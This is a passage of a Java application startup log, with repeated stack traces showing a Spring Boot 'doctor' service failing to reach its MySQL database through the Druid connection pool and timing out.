at com.alibaba.nacos.shaded.com.google.common.util.concurrent.AbstractFuture.get(AbstractFuture.java:508)
at com.alibaba.nacos.common.remote.client.grpc.GrpcClient.serverCheck(GrpcClient.java:148)
at com.alibaba.nacos.common.remote.client.grpc.GrpcClient.connectToServer(GrpcClient.java:264)
at com.alibaba.nacos.common.remote.client.RpcClient.reconnect(RpcClient.java:522)
at com.alibaba.nacos.common.remote.client.RpcClient.lambda$start$2(RpcClient.java:370)
at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:539)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at java.base/java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:304)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
at java.base/java.lang.Thread.run(Thread.java:833)
13:57:25.180 [main] ERROR c.a.d.p.DruidDataSource - [init,905] - init datasource error, url: jdbc:mysql://10.100.1.2:3306/t_individual?useUnicode=true&characterEncoding=utf8&zeroDateTimeBehavior=convertToNull&useSSL=true&serverTimezone=GMT%2B8
com.mysql.cj.jdbc.exceptions.CommunicationsException: Communications link failure
The last packet sent successfully to the server was 0 milliseconds ago. The driver has not received any packets from the server.
at com.mysql.cj.jdbc.exceptions.SQLError.createCommunicationsException(SQLError.java:174)
at com.mysql.cj.jdbc.exceptions.SQLExceptionsMapping.translateException(SQLExceptionsMapping.java:64)
at com.mysql.cj.jdbc.ConnectionImpl.createNewIO(ConnectionImpl.java:828)
at com.mysql.cj.jdbc.ConnectionImpl.<init>(ConnectionImpl.java:448)
at com.mysql.cj.jdbc.ConnectionImpl.getInstance(ConnectionImpl.java:241)
at com.mysql.cj.jdbc.NonRegisteringDriver.connect(NonRegisteringDriver.java:198)
at com.alibaba.druid.filter.FilterChainImpl.connection_connect(FilterChainImpl.java:118)
at com.alibaba.druid.filter.FilterAdapter.connection_connect(FilterAdapter.java:764)
at com.alibaba.druid.filter.FilterEventAdapter.connection_connect(FilterEventAdapter.java:33)
at com.alibaba.druid.filter.FilterChainImpl.connection_connect(FilterChainImpl.java:112)
at com.alibaba.druid.filter.stat.StatFilter.connection_connect(StatFilter.java:232)
at com.alibaba.druid.filter.FilterChainImpl.connection_connect(FilterChainImpl.java:112)
at com.alibaba.druid.pool.DruidAbstractDataSource.createPhysicalConnection(DruidAbstractDataSource.java:1645)
at com.alibaba.druid.pool.DruidAbstractDataSource.createPhysicalConnection(DruidAbstractDataSource.java:1709)
at com.alibaba.druid.pool.DruidDataSource.init(DruidDataSource.java:901)
at com.baomidou.dynamic.datasource.creator.DruidDataSourceCreator.doCreateDataSource(DruidDataSourceCreator.java:85)
at com.baomidou.dynamic.datasource.creator.AbstractDataSourceCreator.createDataSource(AbstractDataSourceCreator.java:70)
at com.baomidou.dynamic.datasource.creator.DefaultDataSourceCreator.createDataSource(DefaultDataSourceCreator.java:48)
at com.baomidou.dynamic.datasource.provider.AbstractDataSourceProvider.createDataSourceMap(AbstractDataSourceProvider.java:47)
at com.baomidou.dynamic.datasource.provider.YmlDynamicDataSourceProvider.loadDataSources(YmlDynamicDataSourceProvider.java:42)
at com.baomidou.dynamic.datasource.DynamicRoutingDataSource.afterPropertiesSet(DynamicRoutingDataSource.java:219)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.invokeInitMethods(AbstractAutowireCapableBeanFactory.java:1863)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.initializeBean(AbstractAutowireCapableBeanFactory.java:1800)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.doCreateBean(AbstractAutowireCapableBeanFactory.java:620)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBean(AbstractAutowireCapableBeanFactory.java:542)
at org.springframework.beans.factory.support.AbstractBeanFactory.lambda$doGetBean$0(AbstractBeanFactory.java:335)
at org.springframework.beans.factory.support.DefaultSingletonBeanRegistry.getSingleton(DefaultSingletonBeanRegistry.java:234)
at org.springframework.beans.factory.support.AbstractBeanFactory.doGetBean(AbstractBeanFactory.java:333)
at org.springframework.beans.factory.support.AbstractBeanFactory.getBean(AbstractBeanFactory.java:208)
at org.springframework.beans.factory.config.DependencyDescriptor.resolveCandidate(DependencyDescriptor.java:276)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.addCandidateEntry(DefaultListableBeanFactory.java:1609)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.findAutowireCandidates(DefaultListableBeanFactory.java:1573)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.resolveMultipleBeans(DefaultListableBeanFactory.java:1492)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.doResolveDependency(DefaultListableBeanFactory.java:1349)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.resolveDependency(DefaultListableBeanFactory.java:1311)
at org.springframework.beans.factory.support.ConstructorResolver.resolveAutowiredArgument(ConstructorResolver.java:887)
at org.springframework.beans.factory.support.ConstructorResolver.createArgumentArray(ConstructorResolver.java:791)
at org.springframework.beans.factory.support.ConstructorResolver.instantiateUsingFactoryMethod(ConstructorResolver.java:541)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.instantiateUsingFactoryMethod(AbstractAutowireCapableBeanFactory.java:1352)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBeanInstance(AbstractAutowireCapableBeanFactory.java:1195)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.doCreateBean(AbstractAutowireCapableBeanFactory.java:582)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBean(AbstractAutowireCapableBeanFactory.java:542)
at org.springframework.beans.factory.support.AbstractBeanFactory.lambda$doGetBean$0(AbstractBeanFactory.java:335)
at org.springframework.beans.factory.support.DefaultSingletonBeanRegistry.getSingleton(DefaultSingletonBeanRegistry.java:234)
at org.springframework.beans.factory.support.AbstractBeanFactory.doGetBean(AbstractBeanFactory.java:333)
at org.springframework.beans.factory.support.AbstractBeanFactory.getBean(AbstractBeanFactory.java:208)
at org.springframework.beans.factory.config.DependencyDescriptor.resolveCandidate(DependencyDescriptor.java:276)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.addCandidateEntry(DefaultListableBeanFactory.java:1616)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.findAutowireCandidates(DefaultListableBeanFactory.java:1573)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.resolveMultipleBeans(DefaultListableBeanFactory.java:1417)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.doResolveDependency(DefaultListableBeanFactory.java:1349)
at org.springframework.beans.factory.support.DefaultListableBeanFactory$DependencyObjectProvider.resolveStream(DefaultListableBeanFactory.java:2119)
at org.springframework.beans.factory.support.DefaultListableBeanFactory$DependencyObjectProvider.orderedStream(DefaultListableBeanFactory.java:2113)
at org.springframework.boot.actuate.autoconfigure.metrics.MeterRegistryConfigurer.addBinders(MeterRegistryConfigurer.java:86)
at org.springframework.boot.actuate.autoconfigure.metrics.MeterRegistryConfigurer.configure(MeterRegistryConfigurer.java:68)
at org.springframework.boot.actuate.autoconfigure.metrics.MeterRegistryPostProcessor.postProcessAfterInitialization(MeterRegistryPostProcessor.java:64)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.applyBeanPostProcessorsAfterInitialization(AbstractAutowireCapableBeanFactory.java:455)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.initializeBean(AbstractAutowireCapableBeanFactory.java:1808)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.doCreateBean(AbstractAutowireCapableBeanFactory.java:620)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBean(AbstractAutowireCapableBeanFactory.java:542)
at org.springframework.beans.factory.support.AbstractBeanFactory.lambda$doGetBean$0(AbstractBeanFactory.java:335)
at org.springframework.beans.factory.support.DefaultSingletonBeanRegistry.getSingleton(DefaultSingletonBeanRegistry.java:234)
at org.springframework.beans.factory.support.AbstractBeanFactory.doGetBean(AbstractBeanFactory.java:333)
at org.springframework.beans.factory.support.AbstractBeanFactory.getBean(AbstractBeanFactory.java:208)
at org.springframework.beans.factory.config.DependencyDescriptor.resolveCandidate(DependencyDescriptor.java:276)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.doResolveDependency(DefaultListableBeanFactory.java:1391)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.resolveDependency(DefaultListableBeanFactory.java:1311)
at org.springframework.beans.factory.support.ConstructorResolver.resolveAutowiredArgument(ConstructorResolver.java:887)
at org.springframework.beans.factory.support.ConstructorResolver.createArgumentArray(ConstructorResolver.java:791)
at org.springframework.beans.factory.support.ConstructorResolver.instantiateUsingFactoryMethod(ConstructorResolver.java:541)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.instantiateUsingFactoryMethod(AbstractAutowireCapableBeanFactory.java:1352)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBeanInstance(AbstractAutowireCapableBeanFactory.java:1195)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.doCreateBean(AbstractAutowireCapableBeanFactory.java:582)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBean(AbstractAutowireCapableBeanFactory.java:542)
at org.springframework.beans.factory.support.AbstractBeanFactory.lambda$doGetBean$0(AbstractBeanFactory.java:335)
at org.springframework.beans.factory.support.DefaultSingletonBeanRegistry.getSingleton(DefaultSingletonBeanRegistry.java:234)
at org.springframework.beans.factory.support.AbstractBeanFactory.doGetBean(AbstractBeanFactory.java:333)
at org.springframework.beans.factory.support.AbstractBeanFactory.getBean(AbstractBeanFactory.java:213)
at org.springframework.boot.web.servlet.ServletContextInitializerBeans.getOrderedBeansOfType(ServletContextInitializerBeans.java:212)
at org.springframework.boot.web.servlet.ServletContextInitializerBeans.getOrderedBeansOfType(ServletContextInitializerBeans.java:203)
at org.springframework.boot.web.servlet.ServletContextInitializerBeans.addServletContextInitializerBeans(ServletContextInitializerBeans.java:97)
at org.springframework.boot.web.servlet.ServletContextInitializerBeans.<init>(ServletContextInitializerBeans.java:86)
at org.springframework.boot.web.servlet.context.ServletWebServerApplicationContext.getServletContextInitializerBeans(ServletWebServerApplicationContext.java:262)
at org.springframework.boot.web.servlet.context.ServletWebServerApplicationContext.selfInitialize(ServletWebServerApplicationContext.java:236)
at org.springframework.boot.web.embedded.tomcat.TomcatStarter.onStartup(TomcatStarter.java:53)
at org.apache.catalina.core.StandardContext.startInternal(StandardContext.java:5219)
at org.apache.catalina.util.LifecycleBase.start(LifecycleBase.java:183)
at org.apache.catalina.core.ContainerBase$StartChild.call(ContainerBase.java:1396)
at org.apache.catalina.core.ContainerBase$StartChild.call(ContainerBase.java:1386)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at org.apache.tomcat.util.threads.InlineExecutorService.execute(InlineExecutorService.java:75)
at java.base/java.util.concurrent.AbstractExecutorService.submit(AbstractExecutorService.java:145)
at org.apache.catalina.core.ContainerBase.startInternal(ContainerBase.java:919)
at org.apache.catalina.core.StandardHost.startInternal(StandardHost.java:835)
at org.apache.catalina.util.LifecycleBase.start(LifecycleBase.java:183)
at org.apache.catalina.core.ContainerBase$StartChild.call(ContainerBase.java:1396)
at org.apache.catalina.core.ContainerBase$StartChild.call(ContainerBase.java:1386)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at org.apache.tomcat.util.threads.InlineExecutorService.execute(InlineExecutorService.java:75)
at java.base/java.util.concurrent.AbstractExecutorService.submit(AbstractExecutorService.java:145)
at org.apache.catalina.core.ContainerBase.startInternal(ContainerBase.java:919)
at org.apache.catalina.core.StandardEngine.startInternal(StandardEngine.java:265)
at org.apache.catalina.util.LifecycleBase.start(LifecycleBase.java:183)
at org.apache.catalina.core.StandardService.startInternal(StandardService.java:432)
at org.apache.catalina.util.LifecycleBase.start(LifecycleBase.java:183)
at org.apache.catalina.core.StandardServer.startInternal(StandardServer.java:930)
at org.apache.catalina.util.LifecycleBase.start(LifecycleBase.java:183)
at org.apache.catalina.startup.Tomcat.start(Tomcat.java:486)
at org.springframework.boot.web.embedded.tomcat.TomcatWebServer.initialize(TomcatWebServer.java:123)
at org.springframework.boot.web.embedded.tomcat.TomcatWebServer.<init>(TomcatWebServer.java:104)
at org.springframework.boot.web.embedded.tomcat.TomcatServletWebServerFactory.getTomcatWebServer(TomcatServletWebServerFactory.java:479)
at org.springframework.boot.web.embedded.tomcat.TomcatServletWebServerFactory.getWebServer(TomcatServletWebServerFactory.java:211)
at org.springframework.boot.web.servlet.context.ServletWebServerApplicationContext.createWebServer(ServletWebServerApplicationContext.java:184)
at org.springframework.boot.web.servlet.context.ServletWebServerApplicationContext.onRefresh(ServletWebServerApplicationContext.java:162)
at org.springframework.context.support.AbstractApplicationContext.refresh(AbstractApplicationContext.java:577)
at org.springframework.boot.web.servlet.context.ServletWebServerApplicationContext.refresh(ServletWebServerApplicationContext.java:147)
at org.springframework.boot.SpringApplication.refresh(SpringApplication.java:734)
at org.springframework.boot.SpringApplication.refreshContext(SpringApplication.java:408)
at org.springframework.boot.SpringApplication.run(SpringApplication.java:308)
at org.springframework.boot.SpringApplication.run(SpringApplication.java:1306)
at org.springframework.boot.SpringApplication.run(SpringApplication.java:1295)
at com.grail.doctor.DoctorApplication.main(DoctorApplication.java:20)
Caused by: com.mysql.cj.exceptions.CJCommunicationsException: Communications link failure
The last packet sent successfully to the server was 0 milliseconds ago. The driver has not received any packets from the server.
at java.base/jdk.internal.reflect.DirectConstructorHandleAccessor.newInstance(DirectConstructorHandleAccessor.java:67)
at java.base/java.lang.reflect.Constructor.newInstanceWithCaller(Constructor.java:499)
at java.base/java.lang.reflect.Constructor.newInstance(Constructor.java:483)
at com.mysql.cj.exceptions.ExceptionFactory.createException(ExceptionFactory.java:61)
at com.mysql.cj.exceptions.ExceptionFactory.createException(ExceptionFactory.java:105)
at com.mysql.cj.exceptions.ExceptionFactory.createException(ExceptionFactory.java:151)
at com.mysql.cj.exceptions.ExceptionFactory.createCommunicationsException(ExceptionFactory.java:167)
at com.mysql.cj.protocol.a.NativeSocketConnection.connect(NativeSocketConnection.java:89)
at com.mysql.cj.NativeSession.connect(NativeSession.java:120)
at com.mysql.cj.jdbc.ConnectionImpl.connectOneTryOnly(ConnectionImpl.java:948)
at com.mysql.cj.jdbc.ConnectionImpl.createNewIO(ConnectionImpl.java:818)
... 119 common frames omitted
Caused by: java.net.ConnectException: Connection timed out: connect
at java.base/sun.nio.ch.Net.connect0(Native Method)
at java.base/sun.nio.ch.Net.connect(Net.java:579)
at java.base/sun.nio.ch.Net.connect(Net.java:568)
at java.base/sun.nio.ch.NioSocketImpl.connect(NioSocketImpl.java:585)
at java.base/java.net.SocksSocketImpl.connect(SocksSocketImpl.java:327)
at java.base/java.net.Socket.connect(Socket.java:633)
at com.mysql.cj.protocol.StandardSocketFactory.connect(StandardSocketFactory.java:153)
at com.mysql.cj.protocol.a.NativeSocketConnection.connect(NativeSocketConnection.java:63)
... 122 common frames omitted
13:57:25.184 [main] ERROR c.a.d.p.DruidDataSource - [init,947] - {dataSource-1} init error
com.mysql.cj.jdbc.exceptions.CommunicationsException: Communications link failure
The last packet sent successfully to the server was 0 milliseconds ago. The driver has not received any packets from the server.
at com.mysql.cj.jdbc.exceptions.SQLError.createCommunicationsException(SQLError.java:174)
at com.mysql.cj.jdbc.exceptions.SQLExceptionsMapping.translateException(SQLExceptionsMapping.java:64)
at com.mysql.cj.jdbc.ConnectionImpl.createNewIO(ConnectionImpl.java:828)
at com.mysql.cj.jdbc.ConnectionImpl.<init>(ConnectionImpl.java:448)
at com.mysql.cj.jdbc.ConnectionImpl.getInstance(ConnectionImpl.java:241)
at com.mysql.cj.jdbc.NonRegisteringDriver.connect(NonRegisteringDriver.java:198)
at com.alibaba.druid.filter.FilterChainImpl.connection_connect(FilterChainImpl.java:118)
at com.alibaba.druid.filter.FilterAdapter.connection_connect(FilterAdapter.java:764)
at com.alibaba.druid.filter.FilterEventAdapter.connection_connect(FilterEventAdapter.java:33)
at com.alibaba.druid.filter.FilterChainImpl.connection_connect(FilterChainImpl.java:112)
at com.alibaba.druid.filter.stat.StatFilter.connection_connect(StatFilter.java:232)
at com.alibaba.druid.filter.FilterChainImpl.connection_connect(FilterChainImpl.java:112)
at com.alibaba.druid.pool.DruidAbstractDataSource.createPhysicalConnection(DruidAbstractDataSource.java:1645)
at com.alibaba.druid.pool.DruidAbstractDataSource.createPhysicalConnection(DruidAbstractDataSource.java:1709)
at com.alibaba.druid.pool.DruidDataSource.init(DruidDataSource.java:901)
at com.baomidou.dynamic.datasource.creator.DruidDataSourceCreator.doCreateDataSource(DruidDataSourceCreator.java:85)
at com.baomidou.dynamic.datasource.creator.AbstractDataSourceCreator.createDataSource(AbstractDataSourceCreator.java:70)
at com.baomidou.dynamic.datasource.creator.DefaultDataSourceCreator.createDataSource(DefaultDataSourceCreator.java:48)
at com.baomidou.dynamic.datasource.provider.AbstractDataSourceProvider.createDataSourceMap(AbstractDataSourceProvider.java:47)
at com.baomidou.dynamic.datasource.provider.YmlDynamicDataSourceProvider.loadDataSources(YmlDynamicDataSourceProvider.java:42)
at com.baomidou.dynamic.datasource.DynamicRoutingDataSource.afterPropertiesSet(DynamicRoutingDataSource.java:219)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.invokeInitMethods(AbstractAutowireCapableBeanFactory.java:1863)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.initializeBean(AbstractAutowireCapableBeanFactory.java:1800)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.doCreateBean(AbstractAutowireCapableBeanFactory.java:620)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBean(AbstractAutowireCapableBeanFactory.java:542)
at org.springframework.beans.factory.support.AbstractBeanFactory.lambda$doGetBean$0(AbstractBeanFactory.java:335)
at org.springframework.beans.factory.support.DefaultSingletonBeanRegistry.getSingleton(DefaultSingletonBeanRegistry.java:234)
at org.springframework.beans.factory.support.AbstractBeanFactory.doGetBean(AbstractBeanFactory.java:333)
at org.springframework.beans.factory.support.AbstractBeanFactory.getBean(AbstractBeanFactory.java:208)
at org.springframework.beans.factory.config.DependencyDescriptor.resolveCandidate(DependencyDescriptor.java:276)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.addCandidateEntry(DefaultListableBeanFactory.java:1609)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.findAutowireCandidates(DefaultListableBeanFactory.java:1573)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.resolveMultipleBeans(DefaultListableBeanFactory.java:1492)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.doResolveDependency(DefaultListableBeanFactory.java:1349)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.resolveDependency(DefaultListableBeanFactory.java:1311)
at org.springframework.beans.factory.support.ConstructorResolver.resolveAutowiredArgument(ConstructorResolver.java:887)
at org.springframework.beans.factory.support.ConstructorResolver.createArgumentArray(ConstructorResolver.java:791)
at org.springframework.beans.factory.support.ConstructorResolver.instantiateUsingFactoryMethod(ConstructorResolver.java:541)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.instantiateUsingFactoryMethod(AbstractAutowireCapableBeanFactory.java:1352)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBeanInstance(AbstractAutowireCapableBeanFactory.java:1195)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.doCreateBean(AbstractAutowireCapableBeanFactory.java:582)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBean(AbstractAutowireCapableBeanFactory.java:542)
at org.springframework.beans.factory.support.AbstractBeanFactory.lambda$doGetBean$0(AbstractBeanFactory.java:335)
at org.springframework.beans.factory.support.DefaultSingletonBeanRegistry.getSingleton(DefaultSingletonBeanRegistry.java:234)
at org.springframework.beans.factory.support.AbstractBeanFactory.doGetBean(AbstractBeanFactory.java:333)
at org.springframework.beans.factory.support.AbstractBeanFactory.getBean(AbstractBeanFactory.java:208)
at org.springframework.beans.factory.config.DependencyDescriptor.resolveCandidate(DependencyDescriptor.java:276)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.addCandidateEntry(DefaultListableBeanFactory.java:1616)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.findAutowireCandidates(DefaultListableBeanFactory.java:1573)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.resolveMultipleBeans(DefaultListableBeanFactory.java:1417)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.doResolveDependency(DefaultListableBeanFactory.java:1349)
at org.springframework.beans.factory.support.DefaultListableBeanFactory$DependencyObjectProvider.resolveStream(DefaultListableBeanFactory.java:2119)
at org.springframework.beans.factory.support.DefaultListableBeanFactory$DependencyObjectProvider.orderedStream(DefaultListableBeanFactory.java:2113)
at org.springframework.boot.actuate.autoconfigure.metrics.MeterRegistryConfigurer.addBinders(MeterRegistryConfigurer.java:86)
at org.springframework.boot.actuate.autoconfigure.metrics.MeterRegistryConfigurer.configure(MeterRegistryConfigurer.java:68)
at org.springframework.boot.actuate.autoconfigure.metrics.MeterRegistryPostProcessor.postProcessAfterInitialization(MeterRegistryPostProcessor.java:64)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.applyBeanPostProcessorsAfterInitialization(AbstractAutowireCapableBeanFactory.java:455)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.initializeBean(AbstractAutowireCapableBeanFactory.java:1808)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.doCreateBean(AbstractAutowireCapableBeanFactory.java:620)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBean(AbstractAutowireCapableBeanFactory.java:542)
at org.springframework.beans.factory.support.AbstractBeanFactory.lambda$doGetBean$0(AbstractBeanFactory.java:335)
at org.springframework.beans.factory.support.DefaultSingletonBeanRegistry.getSingleton(DefaultSingletonBeanRegistry.java:234)
at org.springframework.beans.factory.support.AbstractBeanFactory.doGetBean(AbstractBeanFactory.java:333)
at org.springframework.beans.factory.support.AbstractBeanFactory.getBean(AbstractBeanFactory.java:208)
at org.springframework.beans.factory.config.DependencyDescriptor.resolveCandidate(DependencyDescriptor.java:276)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.doResolveDependency(DefaultListableBeanFactory.java:1391)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.resolveDependency(DefaultListableBeanFactory.java:1311)
at org.springframework.beans.factory.support.ConstructorResolver.resolveAutowiredArgument(ConstructorResolver.java:887)
at org.springframework.beans.factory.support.ConstructorResolver.createArgumentArray(ConstructorResolver.java:791)
at org.springframework.beans.factory.support.ConstructorResolver.instantiateUsingFactoryMethod(ConstructorResolver.java:541)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.instantiateUsingFactoryMethod(AbstractAutowireCapableBeanFactory.java:1352)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBeanInstance(AbstractAutowireCapableBeanFactory.java:1195)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.doCreateBean(AbstractAutowireCapableBeanFactory.java:582)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBean(AbstractAutowireCapableBeanFactory.java:542)
at org.springframework.beans.factory.support.AbstractBeanFactory.lambda$doGetBean$0(AbstractBeanFactory.java:335)
at org.springframework.beans.factory.support.DefaultSingletonBeanRegistry.getSingleton(DefaultSingletonBeanRegistry.java:234)
at org.springframework.beans.factory.support.AbstractBeanFactory.doGetBean(AbstractBeanFactory.java:333)
at org.springframework.beans.factory.support.AbstractBeanFactory.getBean(AbstractBeanFactory.java:213)
at org.springframework.boot.web.servlet.ServletContextInitializerBeans.getOrderedBeansOfType(ServletContextInitializerBeans.java:212)
at org.springframework.boot.web.servlet.ServletContextInitializerBeans.getOrderedBeansOfType(ServletContextInitializerBeans.java:203)
at org.springframework.boot.web.servlet.ServletContextInitializerBeans.addServletContextInitializerBeans(ServletContextInitializerBeans.java:97)
at org.springframework.boot.web.servlet.ServletContextInitializerBeans.<init>(ServletContextInitializerBeans.java:86)
at org.springframework.boot.web.servlet.context.ServletWebServerApplicationContext.getServletContextInitializerBeans(ServletWebServerApplicationContext.java:262)
at org.springframework.boot.web.servlet.context.ServletWebServerApplicationContext.selfInitialize(ServletWebServerApplicationContext.java:236)
at org.springframework.boot.web.embedded.tomcat.TomcatStarter.onStartup(TomcatStarter.java:53)
at org.apache.catalina.core.StandardContext.startInternal(StandardContext.java:5219)
at org.apache.catalina.util.LifecycleBase.start(LifecycleBase.java:183)
at org.apache.catalina.core.ContainerBase$StartChild.call(ContainerBase.java:1396)
at org.apache.catalina.core.ContainerBase$StartChild.call(ContainerBase.java:1386)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at org.apache.tomcat.util.threads.InlineExecutorService.execute(InlineExecutorService.java:75)
at java.base/java.util.concurrent.AbstractExecutorService.submit(AbstractExecutorService.java:145)
at org.apache.catalina.core.ContainerBase.startInternal(ContainerBase.java:919)
at org.apache.catalina.core.StandardHost.startInternal(StandardHost.java:835)
at org.apache.catalina.util.LifecycleBase.start(LifecycleBase.java:183)
at org.apache.catalina.core.ContainerBase$StartChild.call(ContainerBase.java:1396)
at org.apache.catalina.core.ContainerBase$StartChild.call(ContainerBase.java:1386)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at org.apache.tomcat.util.threads.InlineExecutorService.execute(InlineExecutorService.java:75)
at java.base/java.util.concurrent.AbstractExecutorService.submit(AbstractExecutorService.java:145)
at org.apache.catalina.core.ContainerBase.startInternal(ContainerBase.java:919)
at org.apache.catalina.core.StandardEngine.startInternal(StandardEngine.java:265)
at org.apache.catalina.util.LifecycleBase.start(LifecycleBase.java:183)
at org.apache.catalina.core.StandardService.startInternal(StandardService.java:432)
at org.apache.catalina.util.LifecycleBase.start(LifecycleBase.java:183)
at org.apache.catalina.core.StandardServer.startInternal(StandardServer.java:930)
at org.apache.catalina.util.LifecycleBase.start(LifecycleBase.java:183)
at org.apache.catalina.startup.Tomcat.start(Tomcat.java:486)
at org.springframework.boot.web.embedded.tomcat.TomcatWebServer.initialize(TomcatWebServer.java:123)
at org.springframework.boot.web.embedded.tomcat.TomcatWebServer.<init>(TomcatWebServer.java:104)
at org.springframework.boot.web.embedded.tomcat.TomcatServletWebServerFactory.getTomcatWebServer(TomcatServletWebServerFactory.java:479)
at org.springframework.boot.web.embedded.tomcat.TomcatServletWebServerFactory.getWebServer(TomcatServletWebServerFactory.java:211)
at org.springframework.boot.web.servlet.context.ServletWebServerApplicationContext.createWebServer(ServletWebServerApplicationContext.java:184)
at org.springframework.boot.web.servlet.context.ServletWebServerApplicationContext.onRefresh(ServletWebServerApplicationContext.java:162)
at org.springframework.context.support.AbstractApplicationContext.refresh(AbstractApplicationContext.java:577)
at org.springframework.boot.web.servlet.context.ServletWebServerApplicationContext.refresh(ServletWebServerApplicationContext.java:147)
at org.springframework.boot.SpringApplication.refresh(SpringApplication.java:734)
at org.springframework.boot.SpringApplication.refreshContext(SpringApplication.java:408)
at org.springframework.boot.SpringApplication.run(SpringApplication.java:308)
at org.springframework.boot.SpringApplication.run(SpringApplication.java:1306)
at org.springframework.boot.SpringApplication.run(SpringApplication.java:1295)
at com.grail.doctor.DoctorApplication.main(DoctorApplication.java:20)
Caused by: com.mysql.cj.exceptions.CJCommunicationsException: Communications link failure
The last packet sent successfully to the server was 0 milliseconds ago. The driver has not received any packets from the server.
at java.base/jdk.internal.reflect.DirectConstructorHandleAccessor.newInstance(DirectConstructorHandleAccessor.java:67)
at java.base/java.lang.reflect.Constructor.newInstanceWithCaller(Constructor.java:499)
at java.base/java.lang.reflect.Constructor.newInstance(Constructor.java:483)
at com.mysql.cj.exceptions.ExceptionFactory.createException(ExceptionFactory.java:61)
at com.mysql.cj.exceptions.ExceptionFactory.createException(ExceptionFactory.java:105)
at com.mysql.cj.exceptions.ExceptionFactory.createException(ExceptionFactory.java:151)
at com.mysql.cj.exceptions.ExceptionFactory.createCommunicationsException(ExceptionFactory.java:167)
at com.mysql.cj.protocol.a.NativeSocketConnection.connect(NativeSocketConnection.java:89)
at com.mysql.cj.NativeSession.connect(NativeSession.java:120)
at com.mysql.cj.jdbc.ConnectionImpl.connectOneTryOnly(ConnectionImpl.java:948)
at com.mysql.cj.jdbc.ConnectionImpl.createNewIO(ConnectionImpl.java:818)
... 119 common frames omitted
Caused by: java.net.ConnectException: Connection timed out: connect
at java.base/sun.nio.ch.Net.connect0(Native Method)
at java.base/sun.nio.ch.Net.connect(Net.java:579)
at java.base/sun.nio.ch.Net.connect(Net.java:568)
at java.base/sun.nio.ch.NioSocketImpl.connect(NioSocketImpl.java:585)
at java.base/java.net.SocksSocketImpl.connect(SocksSocketImpl.java:327)
at java.base/java.net.Socket.connect(Socket.java:633)
at com.mysql.cj.protocol.StandardSocketFactory.connect(StandardSocketFactory.java:153)
at com.mysql.cj.protocol.a.NativeSocketConnection.connect(NativeSocketConnection.java:63)
... 122 common frames omitted
